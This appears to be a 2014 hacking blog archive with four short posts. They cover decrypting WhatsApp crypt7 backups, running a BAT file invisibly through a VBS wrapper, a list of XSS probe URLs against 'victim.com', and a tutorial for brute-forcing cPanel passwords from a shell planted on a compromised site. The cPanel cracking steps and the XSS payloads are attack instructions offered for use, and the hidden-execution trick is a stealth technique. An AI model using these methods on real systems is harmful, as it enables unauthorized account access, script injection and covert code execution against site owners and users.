Monday, November 17, 2014

How to open what's app crypt7 backup format

Now download WhatsApp Xtract tool.
Extract the content in WhatsApp_Xtract to a New Folder.
Now you need to download Python 32bit or 64bit version depending on your system architecture and install it for the process of decryption of  crypt file.
Make sure you install Python under C:Program Files\PythonThen run pyCrypto.bat as admin.pycrypto download 5mb file via a net.
Now drag one of the databases at /sdcard/WhatsApp/Databases toWhatsApp_xtract_drag’n’drop_database(s)_here file in Xtractor folder.

After the process is finished, your default browser will open up the conversations you made.

Note : Sometimes in the end import Error would occur. In those cases just uninstall and install Python in C: instead of C:Program Files Python

Cyber Forensic software

Digital Cyber Forensic Software

Www.paraben.com

Thursday, November 6, 2014

How to Invisibly Execute BAT File in the Background:

How to Invisibly Execute BAT File in the Background:
1. Let say I will ping google.com byutilizing BAT script.ping www.google.com and then save as ping.bat

2. When we double click the ping.bat we've just created, a command prompt window will popped out and pinging google.com.and the window will automaticaly closed after the execution is complete.

3. We will utilize Windows Script Host RUN method to invisibly execute BAT file in the background

This is the scriptSet WshShell = CreateObject("WScript.Shell")WshShell.Run chr(34) & "C:\ping.bat" & Chr(34), 0Set WshShell = Nothing
save the script as hidden
.vbs with.vbsextension.
4. I've modified the BAT script a little bit, because we need to check whether the script was successfully executed or not.
ipconfig > result.txt all IP configuration result will be saved into result.txt file.
5. When we execute the hidden.vbs, no window popped out and if our script was successfully executed in the background, in ourfolder location should have a new file result.txt contained with information about windows ip configuration.
Hope it's useful

Useful for XSS learners

Useful for XSS learners victim.com/search.php?query="> victim.com/search.php?query=abc//abc">alert(/hello world/); victim.com/search.php?query=000">alert(1337);// victim.com/search.php?query=pwned");alert(/pwned/);// victim.com/search.php?query=pwned//">

How to crack cpanal password

Today i'm going to show you how to crack Cpanel. :D

To crack Cpanel, you must have :SHELLed Site               Cpanel Cracker  if you're using our shell, there already a cpanel cracker :POkay,

let's get it started :)
Procedure1- Uploadcp.phpintoyour shell.

2- Scroll down, click onUserand you will get something like this,You will get all the username of Cpanel2- Copy the Username and Password from your dictionary and paste in theUserandPasscolumn

3- Click start and waitthem cracked. :D4- You will get the result in the next page.DONE!5. You can login at into the Cpanel atwww.example.com:2082:)

That's all my tutorial